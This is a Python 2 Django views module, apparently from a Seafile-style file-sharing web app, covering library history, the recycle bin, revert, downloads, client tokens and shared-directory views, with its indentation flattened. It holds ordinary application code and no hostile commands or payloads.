latest_commit = seaserv.get_commits(repo.id, 0, 1)[0]
if not latest_commit:
return False
if latest_commit.root_id == EMPTY_SHA1:
return False
try:
dirs = wingufile_api.list_dir_by_commit_and_path(latest_commit.id, '/')
except Exception, e:
logger.error(e)
return False
else:
for dirent in dirs:
if stat.S_ISDIR(dirent.props.mode):
return True
return False
def has_repo(repos, repo):
for r in repos:
if repo.id == r.id:
return True
return False
owned_repos, shared_repos, groups_repos, public_repos = get_user_repos(username)
accessible_repos = []
for r in owned_repos:
if not has_repo(accessible_repos, r) and not r.encrypted:
r.has_subdir = check_has_subdir(r)
accessible_repos.append(r)
for r in shared_repos + public_repos:
# For compatibility with diffrent fields names in Repo and
# SharedRepo objects.
r.id = r.repo_id
r.name = r.repo_name
r.desc = r.repo_desc
if not has_repo(accessible_repos, r) and not r.encrypted:
if wingufile_api.check_repo_access_permission(r.id, username) == 'rw':
r.has_subdir = check_has_subdir(r)
accessible_repos.append(r)
for r in groups_repos:
if not has_repo(accessible_repos, r) and not r.encrypted :
if wingufile_api.check_repo_access_permission(r.id, username) == 'rw':
r.has_subdir = check_has_subdir(r)
accessible_repos.append(r)
return accessible_repos
def render_recycle_root(request, repo_id):
repo = get_repo(repo_id)
if not repo:
raise Http404
days = show_delete_days(request)
try:
deleted_entries = seafserv_threaded_rpc.get_deleted(repo_id, days)
except:
deleted_entries = []
dir_list = []
file_list = []
for dirent in deleted_entries:
if stat.S_ISDIR(dirent.mode):
dir_list.append(dirent)
else:
file_list.append(dirent)
# Entries sort by deletion time in descending order.
dir_list.sort(lambda x, y : cmp(y.delete_time,
x.delete_time))
file_list.sort(lambda x, y : cmp(y.delete_time,
x.delete_time))
search_repo_id = None
if not repo.encrypted:
search_repo_id = repo.id
return render_to_response('repo_recycle_view.html', {
'show_recycle_root': True,
'repo': repo,
'dir_list': dir_list,
'file_list': file_list,
'days': days,
'search_repo_id': search_repo_id,
}, context_instance=RequestContext(request))
def render_recycle_dir(request, repo_id, commit_id):
basedir = request.GET.get('base', '')
path = request.GET.get('p', '')
if not basedir or not path:
return render_recycle_root(request, repo_id)
if basedir[0] != '/':
basedir = '/' + basedir
if path[-1] != '/':
path += '/'
repo = get_repo(repo_id)
if not repo:
raise Http404
commit = seafserv_threaded_rpc.get_commit(commit_id)
if not commit:
raise Http404
zipped = gen_path_link(path, '')
file_list, dir_list = get_repo_dirents(request, repo_id, commit, basedir + path)
days = show_delete_days(request)
search_repo_id = None
if not repo.encrypted:
search_repo_id = repo.id
return render_to_response('repo_recycle_view.html', {
'show_recycle_root': False,
'repo': repo,
'zipped': zipped,
'dir_list': dir_list,
'file_list': file_list,
'commit_id': commit_id,
'basedir': basedir,
'path': path,
'days': days,
'search_repo_id': search_repo_id,
}, context_instance=RequestContext(request))
@login_required
def repo_recycle_view(request, repo_id):
if get_user_permission(request, repo_id) != 'rw':
return render_permission_error(request, _(u'Unable to view recycle page'))
commit_id = request.GET.get('commit_id', '')
if not commit_id:
return render_recycle_root(request, repo_id)
else:
return render_recycle_dir(request, repo_id, commit_id)
@login_required
def repo_save_settings(request):
if request.method != 'POST':
raise Http404
username = request.user.username
content_type = 'application/json; charset=utf-8'
form = RepoSettingForm(request.POST)
if form.is_valid():
repo_id = form.cleaned_data['repo_id']
repo_name = form.cleaned_data['repo_name']
repo_desc = form.cleaned_data['repo_desc']
days = form.cleaned_data['days']
repo = get_repo(repo_id)
if not repo:
err_msg = _(u'Library does not exist.')
return HttpResponse(json.dumps({'error': err_msg}),
status=400, content_type=content_type)
# check permission
if request.user.org:
is_owner = True if is_org_repo_owner(
request.user.org['org_id'], repo_id, username) else False
else:
is_owner = True if is_repo_owner(username, repo_id) else False
if not is_owner:
err_msg = _(u'You do not have permission to perform this action.')
return HttpResponse(json.dumps({'error': err_msg}),
status=403, content_type=content_type)
# Edit library info (name, descryption).
if repo.name != repo_name or repo.desc != repo_desc:
if not edit_repo(repo_id, repo_name, repo_desc, username):
err_msg = _(u'Failed to edit library information.')
return HttpResponse(json.dumps({'error': err_msg}),
status=500, content_type=content_type)
# set library history
if days != None:
res = set_repo_history_limit(repo_id, days)
if res != 0:
return HttpResponse(json.dumps({'error': _(u'Failed to save settings on server')}),
status=400, content_type=content_type)
messages.success(request, _(u'Settings saved.'))
return HttpResponse(json.dumps({'success': True}),
content_type=content_type)
else:
return HttpResponse(json.dumps({'error': str(form.errors.values()[0])}),
status=400, content_type=content_type)
def upload_error_msg (code):
err_msg = _(u'Internal Server Error')
if (code == 0):
err_msg = _(u'Filename contains invalid character')
elif (code == 1):
err_msg = _(u'Duplicated filename')
elif (code == 2):
err_msg = _(u'File does not exist')
elif (code == 3):
err_msg = _(u'File size surpasses the limit')
elif (code == 4):
err_msg = _(u'The space of owner is used up, upload failed')
elif (code == 5):
err_msg = _(u'An error occurs during file transfer')
return err_msg
def upload_file_error(request, repo_id):
if request.method == 'GET':
repo = get_repo(repo_id)
if not repo:
raise Http404
parent_dir = request.GET.get('p')
filename = request.GET.get('fn', '')
err = request.GET.get('err')
if not parent_dir or not err:
return render_error(request, _(u'Invalid url'))
zipped = gen_path_link (parent_dir, repo.name)
code = int(err)
err_msg = upload_error_msg(code)
return render_to_response('upload_file_error.html', {
'repo': repo,
'zipped': zipped,
'filename': filename,
'err_msg': err_msg,
}, context_instance=RequestContext(request))
def update_file_error(request, repo_id):
if request.method == 'GET':
repo = get_repo(repo_id)
if not repo:
raise Http404
target_file = request.GET.get('p')
err = request.GET.get('err')
if not target_file or not err:
return render_error(request, _(u'Invalid url'))
zipped = gen_path_link (target_file, repo.name)
code = int(err)
err_msg = upload_error_msg(code)
return render_to_response('update_file_error.html', {
'repo': repo,
'zipped': zipped,
'err_msg': err_msg,
}, context_instance=RequestContext(request))
@login_required
def repo_history(request, repo_id):
"""
List library modification histories.
"""
user_perm = get_user_permission(request, repo_id)
if not user_perm:
return render_permission_error(request, _(u'Unable to view library modification'))
repo = get_repo(repo_id)
if not repo:
raise Http404
password_set = False
if repo.props.encrypted:
try:
ret = seafserv_rpc.is_passwd_set(repo_id, request.user.username)
if ret == 1:
password_set = True
except SearpcError, e:
return render_error(request, e.msg)
if repo.props.encrypted and not password_set:
return HttpResponseRedirect(reverse('repo', args=[repo_id]))
try:
current_page = int(request.GET.get('page', '1'))
per_page = int(request.GET.get('per_page', '25'))
except ValueError:
current_page = 1
per_page = 25
commits_all = get_commits(repo_id, per_page * (current_page -1),
per_page + 1)
commits = commits_all[:per_page]
if len(commits_all) == per_page + 1:
page_next = True
else:
page_next = False
search_repo_id = None
if not repo.encrypted:
search_repo_id = repo.id
return render_to_response('repo_history.html', {
"repo": repo,
"commits": commits,
'current_page': current_page,
'prev_page': current_page-1,
'next_page': current_page+1,
'per_page': per_page,
'page_next': page_next,
'user_perm': user_perm,
'search_repo_id': search_repo_id,
}, context_instance=RequestContext(request))
@login_required
def repo_view_snapshot(request, repo_id):
"""List repo snapshots.
"""
if not access_to_repo(request, repo_id, ''):
return render_permission_error(request, _(u'Unable to view library snapshots'))
repo = get_repo(repo_id)
if not repo:
raise Http404
password_set = False
if repo.props.encrypted:
try:
ret = seafserv_rpc.is_passwd_set(repo_id, request.user.username)
if ret == 1:
password_set = True
except SearpcError, e:
return render_error(request, e.msg)
if repo.props.encrypted and not password_set:
return HttpResponseRedirect(reverse('repo', args=[repo_id]))
try:
current_page = int(request.GET.get('page', '1'))
per_page = int(request.GET.get('per_page', '25'))
except ValueError:
current_page = 1
per_page = 25
# don't show the current commit
commits_all = get_commits(repo_id, per_page * (current_page -1) + 1,
per_page + 1)
commits = commits_all[:per_page]
if len(commits_all) == per_page + 1:
page_next = True
else:
page_next = False
search_repo_id = None
if not repo.encrypted:
search_repo_id = repo.id
return render_to_response('repo_view_snapshot.html', {
"repo": repo,
"commits": commits,
'current_page': current_page,
'prev_page': current_page-1,
'next_page': current_page+1,
'per_page': per_page,
'page_next': page_next,
'search_repo_id': search_repo_id,
}, context_instance=RequestContext(request))
@login_required
def repo_history_revert(request, repo_id):
repo = get_repo(repo_id)
if not repo:
raise Http404
if not access_to_repo(request, repo_id):
return render_permission_error(request, _(u'You have no permission to restore library'))
password_set = False
if repo.props.encrypted:
try:
ret = seafserv_rpc.is_passwd_set(repo_id, request.user.username)
if ret == 1:
password_set = True
except SearpcError, e:
return render_error(request, e.msg)
if repo.props.encrypted and not password_set:
return HttpResponseRedirect(reverse('repo', args=[repo_id]))
commit_id = request.GET.get('commit_id', '')
if not commit_id:
return render_error(request, _(u'Please specify history ID'))
try:
seafserv_threaded_rpc.revert_on_server(repo_id, commit_id, request.user.username)
except SearpcError, e:
if e.msg == 'Bad arguments':
return render_error(request, _(u'Invalid arguments'))
elif e.msg == 'No such repo':
return render_error(request, _(u'Library does not exist'))
elif e.msg == "Commit doesn't exist":
return render_error(request, _(u'History you specified does not exist'))
else:
return render_error(request, _(u'Unknown error'))
return HttpResponseRedirect(reverse(repo_history, args=[repo_id]))
def fpath_to_link(repo_id, path, is_dir=False):
"""Translate file path of a repo to its view link"""
if is_dir:
url = reverse("repo", args=[repo_id])
else:
url = reverse("repo_view_file", args=[repo_id])
href = url + '?p=/%s' % urllib2.quote(path.encode('utf-8'))
return '<a href="%s">%s</a>' % (href, path)
def get_diff(repo_id, arg1, arg2):
lists = {'new' : [], 'removed' : [], 'renamed' : [], 'modified' : [], \
'newdir' : [], 'deldir' : []}
diff_result = seafserv_threaded_rpc.get_diff(repo_id, arg1, arg2)
if not diff_result:
return lists
for d in diff_result:
if d.status == "add":
lists['new'].append(fpath_to_link(repo_id, d.name))
elif d.status == "del":
lists['removed'].append(d.name)
elif d.status == "mov":
lists['renamed'].append(d.name + " ==> " + fpath_to_link(repo_id, d.new_name))
elif d.status == "mod":
lists['modified'].append(fpath_to_link(repo_id, d.name))
elif d.status == "newdir":
lists['newdir'].append(fpath_to_link(repo_id, d.name, is_dir=True))
elif d.status == "deldir":
lists['deldir'].append(d.name)
return lists
@login_required
def repo_history_changes(request, repo_id):
changes = {}
content_type = 'application/json; charset=utf-8'
if not access_to_repo(request, repo_id, ''):
return HttpResponse(json.dumps(changes), content_type=content_type)
repo = get_repo(repo_id)
if not repo:
return HttpResponse(json.dumps(changes), content_type=content_type)
if repo.encrypted and not is_passwd_set(repo_id, request.user.username):
return HttpResponse(json.dumps(changes), content_type=content_type)
commit_id = request.GET.get('commit_id', '')
if not commit_id:
return HttpResponse(json.dumps(changes), content_type=content_type)
changes = get_diff(repo_id, '', commit_id)
c = get_commit(commit_id)
if c.parent_id is None:
# A commit is a first commit only if it's parent id is None.
changes['cmt_desc'] = repo.desc
elif c.second_parent_id is None:
# Normal commit only has one parent.
if c.desc.startswith('Changed library'):
changes['cmt_desc'] = _('Changed library name or description')
else:
# A commit is a merge only if it has two parents.
changes['cmt_desc'] = _('No conflict in the merge.')
return HttpResponse(json.dumps(changes), content_type=content_type)
@login_required
def modify_token(request, repo_id):
if not validate_owner(request, repo_id):
return HttpResponseRedirect(reverse('repo', args=[repo_id]))
token = request.POST.get('token', '')
if token:
seafserv_threaded_rpc.set_repo_token(repo_id, token)
return HttpResponseRedirect(reverse('repo', args=[repo_id]))
@login_required
def repo_remove(request, repo_id):
repo = get_repo(repo_id)
if not repo:
return render_error(request, _(u'Library does not exist'))
user = request.user.username
org, base_template = check_and_get_org_by_repo(repo_id, user)
if org:
# Remove repo in org context, only repo owner or org staff can
# perform this operation.
if request.user.is_staff or org.is_staff or \
is_org_repo_owner(org.org_id, repo_id, user):
# Must get related useres before remove the repo
usernames = get_related_users_by_org_repo(org.org_id, repo_id)
remove_repo(repo_id)
repo_deleted.send(sender=None,
org_id=org.org_id,
usernames=usernames,
repo_owner=user,
repo_id=repo_id,
repo_name=repo.name,
)
else:
err_msg = _(u'Failed to remove library. Only staff or owner can perform this operation.')
messages.error(request, err_msg)
else:
# Remove repo in personal context, only repo owner or site staff can
# perform this operation.
if validate_owner(request, repo_id) or request.user.is_staff:
usernames = get_related_users_by_repo(repo_id)
remove_repo(repo_id)
repo_deleted.send(sender=None,
org_id=-1,
usernames=usernames,
repo_owner=user,
repo_id=repo_id,
repo_name=repo.name,
)
messages.success(request, _(u'Successfully deleted library "%s".') % repo.name)
else:
err_msg = _(u'Failed to remove library. Only staff or owner can perform this operation.')
messages.error(request, err_msg)
next = request.META.get('HTTP_REFERER', None)
if not next:
next = settings.SITE_ROOT
return HttpResponseRedirect(next)
@login_required
def myhome(request):
owned_repos = []
email = request.user.username
quota = seafserv_threaded_rpc.get_user_quota(email)
quota_usage = 0
share_usage = 0
my_usage = get_user_quota_usage(email)
if CALC_SHARE_USAGE:
share_usage = get_user_share_usage(email)
quota_usage = my_usage + share_usage
else:
quota_usage = my_usage
# Get all personal groups I joined.
joined_groups = get_personal_groups_by_user(request.user.username)
def get_abbrev_origin_path(repo_name, path):
if len(path) > 20:
abbrev_path = path[-20:]
return repo_name + '/...' + abbrev_path
else:
return repo_name + path
# compose abbrev origin path for display
sub_repos = []
if ENABLE_SUB_LIBRARY:
sub_repos = wingufile_api.get_virtual_repos_by_owner(email)
for repo in sub_repos:
repo.abbrev_origin_path = get_abbrev_origin_path(repo.origin_repo_name,
repo.origin_path)
calculate_repos_last_modify(sub_repos)
sub_repos.sort(lambda x, y: cmp(y.latest_modify, x.latest_modify))
# Personal repos that I owned.
owned_repos = seafserv_threaded_rpc.list_owned_repos(email)
calculate_repos_last_modify(owned_repos)
owned_repos.sort(lambda x, y: cmp(y.latest_modify, x.latest_modify))
# Personal repos others shared to me
in_repos = list_personal_shared_repos(email, 'to_email', -1, -1)
# For each group I joined...
for grp in joined_groups:
# Get group repos, and for each group repos...
for r_id in get_group_repoids(grp.id):
# No need to list my own repo
if is_repo_owner(email, r_id):
continue
# Convert repo properties due to the different collumns in Repo
# and SharedRepo
r = get_repo(r_id)
if not r:
continue
r.repo_id = r.id
r.repo_name = r.name
r.repo_desc = r.desc
r.last_modified = get_repo_last_modify(r)
r.share_type = 'group'
r.user = get_repo_owner(r_id)
r.user_perm = check_permission(r_id, email)
in_repos.append(r)
in_repos.sort(lambda x, y: cmp(y.last_modified, x.last_modified))
# user notifications
grpmsg_list = []
grpmsg_reply_list = []
joined_group_ids = [x.id for x in joined_groups]
notes = UserNotification.objects.filter(to_user=request.user.username)
for n in notes:
if n.msg_type == 'group_msg':
if int(n.detail) not in joined_group_ids:
continue
grp = get_group(int(n.detail))
grpmsg_list.append(grp)
elif n.msg_type == 'grpmsg_reply':
grpmsg_reply_list.append(n.detail)
# get nickname
profiles = Profile.objects.filter(user=request.user.username)
nickname = profiles[0].nickname if profiles else ''
autocomp_groups = joined_groups
contacts = Contact.objects.get_registered_contacts_by_user(email)
allow_public_share = False if request.cloud_mode else True
starred_files = get_starred_files(request.user.username)
traffic_stat = 0
if TRAFFIC_STATS_ENABLED:
# User's network traffic stat in this month
stat = get_user_traffic_stat(request.user.username)
if stat:
traffic_stat = stat['file_view'] + stat['file_download'] + stat['dir_download']
return render_to_response('myhome.html', {
"nickname": nickname,
"owned_repos": owned_repos,
"quota": quota,
"quota_usage": quota_usage,
"CALC_SHARE_USAGE": CALC_SHARE_USAGE,
"share_usage": share_usage,
"my_usage": my_usage,
"in_repos": in_repos,
"contacts": contacts,
"joined_groups": joined_groups,
"autocomp_groups": autocomp_groups,
"notes": notes,
"grpmsg_list": grpmsg_list,
"grpmsg_reply_list": grpmsg_reply_list,
"create_shared_repo": False,
"allow_public_share": allow_public_share,
"starred_files": starred_files,
"TRAFFIC_STATS_ENABLED": TRAFFIC_STATS_ENABLED,
"traffic_stat": traffic_stat,
"ENABLE_PAYMENT": getattr(settings, 'ENABLE_PAYMENT', False),
"ENABLE_SUB_LIBRARY": ENABLE_SUB_LIBRARY,
"ENABLE_EVENTS": EVENTS_ENABLED,
"sub_repos": sub_repos,
}, context_instance=RequestContext(request))
@login_required
def client_mgmt(request):
username = request.user.username
clients = []
try:
clients = wingufile_api.list_repo_tokens_by_email(username)
except:
pass
if clients:
clients.sort(key=lambda client: client.repo_name)
return render_to_response('client_mgmt.html', {
'clients': clients,
}, context_instance=RequestContext(request))
@login_required
def client_unsync(request):
repo_id = request.GET.get('repo_id', '')
token = request.GET.get('token', '')
username = request.user.username
client_name = request.GET.get('name', '')
if repo_id and token:
try:
wingufile_api.delete_repo_token(repo_id, token, username)
if client_name:
messages.success(request, _(u'Successfully unsync client %s') % client_name)
else:
messages.success(request, _(u'Successfully unsync client'))
except:
if client_name:
messages.error(request, _(u'Failed to unsync client %s') % client_name)
else:
messages.error(request, _(u'Failed to unsync client'))
next = request.META.get('HTTP_REFERER', None)
if not next:
next = settings.SITE_ROOT
return HttpResponseRedirect(next)
# @login_required
# def innerpub_msg_reply(request, msg_id):
# """Show inner pub message replies, and process message reply in ajax"""
# content_type = 'application/json; charset=utf-8'
# if request.is_ajax():
# ctx = {}
# if request.method == 'POST':
# form = MessageReplyForm(request.POST)
# # TODO: invalid form
# if form.is_valid():
# msg = form.cleaned_data['message']
# try:
# innerpub_msg = InnerPubMsg.objects.get(id=msg_id)
# except InnerPubMsg.DoesNotExist:
# return HttpResponseBadRequest(content_type=content_type)
# msg_reply = InnerPubMsgReply()
# msg_reply.reply_to = innerpub_msg
# msg_reply.from_email = request.user.username
# msg_reply.message = msg
# msg_reply.save()
# ctx['reply'] = msg_reply
# html = render_to_string("group/group_reply_new.html", ctx)
# else:
# try:
# msg = InnerPubMsg.objects.get(id=msg_id)
# except InnerPubMsg.DoesNotExist:
# raise HttpResponse(status=400)
# replies = InnerPubMsgReply.objects.filter(reply_to=msg)
# ctx['replies'] = replies
# html = render_to_string("group/group_reply_list.html", ctx)
# serialized_data = json.dumps({"html": html})
# return HttpResponse(serialized_data, content_type=content_type)
# else:
# return HttpResponseBadRequest(content_type=content_type)
@login_required
def public_repo_create(request):
'''
Handle ajax post to create public repo.
'''
if not request.is_ajax() or request.method != 'POST':
return Http404
result = {}
content_type = 'application/json; charset=utf-8'
form = SharedRepoCreateForm(request.POST)
if form.is_valid():
repo_name = form.cleaned_data['repo_name']
repo_desc = form.cleaned_data['repo_desc']
permission = form.cleaned_data['permission']
passwd = form.cleaned_data['passwd']
user = request.user.username
try:
# create a repo
repo_id = seafserv_threaded_rpc.create_repo(repo_name, repo_desc,
user, passwd)
# set this repo as inner pub
seafserv_threaded_rpc.set_inner_pub_repo(repo_id, permission)
except:
repo_id = None
if not repo_id:
result['error'] = _(u'Failed to create library')
else:
result['success'] = True
repo_created.send(sender=None,
org_id=-1,
creator=user,
repo_id=repo_id,
repo_name=repo_name)
return HttpResponse(json.dumps(result), content_type=content_type)
else:
return HttpResponseBadRequest(json.dumps(form.errors),
content_type=content_type)
@login_required
def unsetinnerpub(request, repo_id):
repo = get_repo(repo_id)
if not repo:
messages.error(request, _('Failed to unshare the library, as it does not exist.'))
return HttpResponseRedirect(reverse('share_admin'))
try:
unset_inner_pub_repo(repo_id)
messages.success(request, _('Unshare "%s" successfully.') % repo.name)
except SearpcError:
messages.error(request, _('Failed to unshare "%s".') % repo.name)
return HttpResponseRedirect(reverse('share_admin'))
# @login_required
# def ownerhome(request, owner_name):
# owned_repos = []
# quota_usage = 0
# owned_repos = seafserv_threaded_rpc.list_owned_repos(owner_name)
# quota_usage = seafserv_threaded_rpc.get_user_quota_usage(owner_name)
# user_dict = user_info(request, owner_name)
# return render_to_response('ownerhome.html', {
# "owned_repos": owned_repos,
# "quota_usage": quota_usage,
# "owner": owner_name,
# "user_dict": user_dict,
# }, context_instance=RequestContext(request))
@login_required
def repo_set_access_property(request, repo_id):
ap = request.GET.get('ap', '')
seafserv_threaded_rpc.repo_set_access_property(repo_id, ap)
return HttpResponseRedirect(reverse('repo', args=[repo_id]))
@login_required
def repo_del_file(request, repo_id):
if get_user_permission(request, repo_id) != 'rw':
return render_permission_error(request, _('Failed to delete file.'))
parent_dir = request.GET.get("p", "/")
file_name = request.GET.get("file_name")
user = request.user.username
try:
seafserv_threaded_rpc.del_file(repo_id, parent_dir, file_name, user)
messages.success(request, _(u'%s successfully deleted.') % file_name)
except:
messages.error(request, _(u'Internal error. Failed to delete %s.') % file_name)
url = reverse('repo', args=[repo_id]) + ('?p=%s' % urllib2.quote(parent_dir.encode('utf-8')))
return HttpResponseRedirect(url)
def repo_access_file(request, repo_id, obj_id):
repo = get_repo(repo_id)
if not repo:
raise Http404
password_set = False
if repo.props.encrypted:
try:
ret = seafserv_rpc.is_passwd_set(repo_id, request.user.username)
if ret == 1:
password_set = True
except SearpcError, e:
return render_error(request, e.msg)
if repo.props.encrypted and not password_set:
return HttpResponseRedirect(reverse('repo', args=[repo_id]))
op = request.GET.get('op', 'view')
file_name = request.GET.get('file_name', '')
if op == 'del':
return repo_del_file(request, repo_id)
# If vistor's file shared token in url params matches the token in db,
# then we know the vistor is from file shared link.
share_token = request.GET.get('t', '')
fileshare = FileShare.objects.get(token=share_token) if share_token else None
shared_by = None
if fileshare:
from_shared_link = True
shared_by = fileshare.username
else:
from_shared_link = False
username = request.user.username
path = request.GET.get('p', '')
if get_repo_access_permission(repo_id, username) or \
get_file_access_permission(repo_id, path, username) or from_shared_link:
# Get a token to access file
token = seafserv_rpc.web_get_access_token(repo_id, obj_id, op, username)
else:
return render_permission_error(request, _(u'Unable to access file'))
redirect_url = gen_file_get_url(token, file_name)
if from_shared_link:
# send stats message
try:
file_size = seafserv_threaded_rpc.get_file_size(obj_id)
send_message('winguhub.stats', 'file-download\t%s\t%s\t%s\t%s' % \
(repo.id, shared_by, obj_id, file_size))
except Exception, e:
logger.error('Error when sending file-download message: %s' % str(e))
return HttpResponseRedirect(redirect_url)
def get_repo_download_url(request, repo_id):
repo = seafserv_threaded_rpc.get_repo(repo_id)
repo_name = repo.props.name
quote_repo_name = quote(repo_name.encode('utf-8'))
encrypted = repo.props.encrypted
if encrypted:
enc = '1'
else:
enc = ''
relay_id = get_session_info().id
if not relay_id:
return '', _(u"Failed to download library, unable to find server")
try:
token = seafserv_threaded_rpc.generate_repo_token \
(repo_id, request.user.username)
except Exception, e:
return '', str(e)
addr, port = get_ccnet_server_addr_port ()
if not (addr and port):
return '', _(u"Invalid server setting")
ccnet_applet_root = get_ccnetapplet_root()
email = urllib2.quote(request.user.username.encode('utf-8'))
url = ccnet_applet_root + "/repo/download/"
url += "?relay_id=%s&relay_addr=%s&relay_port=%s" % (relay_id, addr, port)
url += "&email=%s&token=%s" % (email, token)
url += "&repo_id=%s&repo_name=%s" % (repo_id, quote_repo_name)
if enc:
url += "&encrypted=1&magic=%s" % repo.magic
return url, ''
@login_required
def repo_download(request):
repo_id = request.GET.get('repo_id', '')
repo = get_repo(repo_id)
if repo is None:
raise Http404
download_url, err = get_repo_download_url(request, repo_id)
if err:
return render_to_response('error.html', {
"error_msg": err
}, context_instance=RequestContext(request))
return HttpResponseRedirect(download_url)
@login_required
def wingufile_access_check(request):
repo_id = request.GET.get('repo_id', '')
repo = get_repo(repo_id)
if repo is None:
raise Http404
applet_root = get_ccnetapplet_root()
download_url, err = get_repo_download_url (request, repo_id)
if err:
return render_to_response('error.html', {
"error_msg": err
}, context_instance=RequestContext(request))
return render_to_response('wingufile_access_check.html', {
'repo_id': repo_id,
'applet_root': applet_root,
'download_url': download_url,
}, context_instance=RequestContext(request))
@login_required
def file_upload_progress_page(request):
'''
As iframe in repo_upload_file.html, for solving problem in chrome.
'''
uuid = request.GET.get('uuid', '')
httpserver_root = get_httpserver_root()
upload_progress_con_id = request.GET.get('upload_progress_con_id', '')
return render_to_response('file_upload_progress_page.html', {
'uuid': uuid,
'httpserver_root': httpserver_root,
'upload_progress_con_id': upload_progress_con_id,
}, context_instance=RequestContext(request))
@login_required
def validate_filename(request):
repo_id = request.GET.get('repo_id')
filename = request.GET.get('filename')
if not (repo_id and filename):
return render_error(request)
result = {'ret':'yes'}
try:
ret = is_valid_filename(filename)
except SearpcError:
result['ret'] = 'error'
else:
result['ret'] = 'yes' if ret == 1 else 'no'
content_type = 'application/json; charset=utf-8'
return HttpResponse(json.dumps(result), content_type=content_type)
@login_required
def repo_create(request):
'''
Handle ajax post.
'''
if not request.is_ajax() or request.method != 'POST':
return Http404
result = {}
content_type = 'application/json; charset=utf-8'
form = RepoCreateForm(request.POST)
if form.is_valid():
repo_name = form.cleaned_data['repo_name']
repo_desc = form.cleaned_data['repo_desc']
passwd = form.cleaned_data['passwd']
user = request.user.username
try:
repo_id = seafserv_threaded_rpc.create_repo(repo_name, repo_desc,
user, passwd)
except:
repo_id = None
if not repo_id:
result['error'] = _(u"Failed to create library")
else:
result['success'] = True
repo_created.send(sender=None,
org_id=-1,
creator=user,
repo_id=repo_id,
repo_name=repo_name)
return HttpResponse(json.dumps(result), content_type=content_type)
else:
return HttpResponseBadRequest(json.dumps(form.errors),
content_type=content_type)
def render_file_revisions (request, repo_id):
"""List all history versions of a file."""
path = request.GET.get('p', '/')
if path[-1] == '/':
path = path[:-1]
u_filename = os.path.basename(path)
filename = urllib2.quote(u_filename.encode('utf-8'))
if not path:
return render_error(request)
repo = get_repo(repo_id)
if not repo:
error_msg = _(u"Library does not exist")
return render_error(request, error_msg)
filetype = get_file_type_and_ext(u_filename)[0].lower()
if filetype == 'text' or filetype == 'markdown':
can_compare = True
else:
can_compare = False
try:
commits = seafserv_threaded_rpc.list_file_revisions(repo_id, path,
-1, -1)
except SearpcError, e:
logger.error(e.msg)
return render_error(request, e.msg)
if not commits:
return render_error(request)
# Check whether user is repo owner
if validate_owner(request, repo_id):
is_owner = True
else:
is_owner = False
try:
for commit in commits:
file_id, file_size = get_file_revision_id_size (commit.id, path)
if not file_id or file_size is None:
# do not use 'not file_size', since it's ok to have file_size = 0
return render_error(request)
commit.revision_file_size = file_size
commit.file_id = file_id
except Exception, e:
return render_error(request, str(e))
zipped = gen_path_link(path, repo.name)
search_repo_id = None
if not repo.encrypted:
search_repo_id = repo.id
return render_to_response('file_revisions.html', {
'repo': repo,
'path': path,
'u_filename': u_filename,
'zipped': zipped,
'commits': commits,
'is_owner': is_owner,
'can_compare': can_compare,
'search_repo_id': search_repo_id,
}, context_instance=RequestContext(request))
@login_required
def repo_revert_file (request, repo_id):
commit_id = request.GET.get('commit')
path = request.GET.get('p')
from_page = request.GET.get('from')
if not (commit_id and path and from_page):
return render_error(request, _(u"Invalid arguments"))
try:
ret = seafserv_threaded_rpc.revert_file (repo_id, commit_id,
path.encode('utf-8'), request.user.username)
except Exception, e:
return render_error(request, str(e))
else:
if from_page == 'repo_history':
# When revert file from repo history, we redirect to repo history
url = reverse('repo', args=[repo_id]) + u'?commit_id=%s&history=y' % commit_id
elif from_page == 'recycle':
# When revert from recycle page, redirect to recycle page.
url = reverse('repo_recycle_view', args=[repo_id])
else:
# When revert file from file history, we redirect to parent dir of this file
parent_dir = os.path.dirname(path)
url = reverse('repo', args=[repo_id]) + ('?p=%s' % urllib2.quote(parent_dir.encode('utf-8')))
if ret == 1:
root_url = reverse('repo', args=[repo_id]) + u'?p=/'
msg = _(u'Successfully revert %(path)s to <a href="%(root)s">root directory.</a>') % {"path":path.lstrip('/'), "root":root_url}
messages.add_message(request, messages.INFO, msg)
else:
file_view_url = reverse('repo_view_file', args=[repo_id]) + u'?p=' + urllib2.quote(path.encode('utf-8'))
msg = _(u'Successfully revert <a href="%(url)s">%(path)s</a>') % {"url":file_view_url, "path":path.lstrip('/')}
messages.add_message(request, messages.INFO, msg)
return HttpResponseRedirect(url)
@login_required
def repo_revert_dir (request, repo_id):
commit_id = request.GET.get('commit')
path = request.GET.get('p')
if not (commit_id and path):
return render_error(request, _(u"Invalid arguments"))
try:
ret = seafserv_threaded_rpc.revert_dir (repo_id, commit_id,
path.encode('utf-8'), request.user.username)
except Exception, e:
return render_error(request, str(e))
else:
url = reverse('repo_recycle_view', args=[repo_id])
if ret == 1:
root_url = reverse('repo', args=[repo_id]) + u'?p=/'
msg = _(u'Successfully revert %(path)s to <a href="%(url)s">root directory.</a>') % {"path":path.lstrip('/'), "url":root_url}
messages.add_message(request, messages.INFO, msg)
else:
dir_view_url = reverse('repo', args=[repo_id]) + u'?p=' + urllib2.quote(path.encode('utf-8'))
msg = _(u'Successfully revert <a href="%(url)s">%(path)s</a>') % {"url":dir_view_url, "path":path.lstrip('/')}
messages.add_message(request, messages.INFO, msg)
return HttpResponseRedirect(url)
@login_required
def file_revisions(request, repo_id):
if request.method != 'GET':
return render_error(request)
op = request.GET.get('op')
if not op:
return render_file_revisions(request, repo_id)
elif op != 'download':
return render_error(request)
commit_id = request.GET.get('commit')
path = request.GET.get('p')
if not (commit_id and path):
return render_error(request)
if op == 'download':
def handle_download():
parent_dir = os.path.dirname(path)
file_name = os.path.basename(path)
seafdir = wingufile_api.list_dir_by_commit_and_path (commit_id,
parent_dir)
if not seafdir:
return render_error(request)
# for ... else ...
for dirent in seafdir:
if dirent.obj_name == file_name:
break
else:
return render_error(request)
url = reverse('repo_access_file', args=[repo_id, dirent.obj_id])
url += '?file_name=%s&op=download' % urllib2.quote(file_name.encode('utf-8'))
return HttpResponseRedirect(url)
try:
return handle_download()
except Exception, e:
return render_error(request, str(e))
def view_shared_dir(request, token):
assert token is not None # Checked by URLconf
try:
fileshare = FileShare.objects.get(token=token)
except FileShare.DoesNotExist:
raise Http404
username = fileshare.username
repo_id = fileshare.repo_id
path = request.GET.get('p', '')
path = fileshare.path if not path else path
if path[-1] != '/': # Normalize dir path
path += '/'
if not path.startswith(fileshare.path):
path = fileshare.path # Can not view upper dir of shared dir
repo = get_repo(repo_id)
if not repo:
raise Http404
dir_name = os.path.basename(path[:-1])
current_commit = get_commits(repo_id, 0, 1)[0]
file_list, dir_list = get_repo_dirents(request, repo_id, current_commit,
path)
zipped = gen_path_link(path, '')
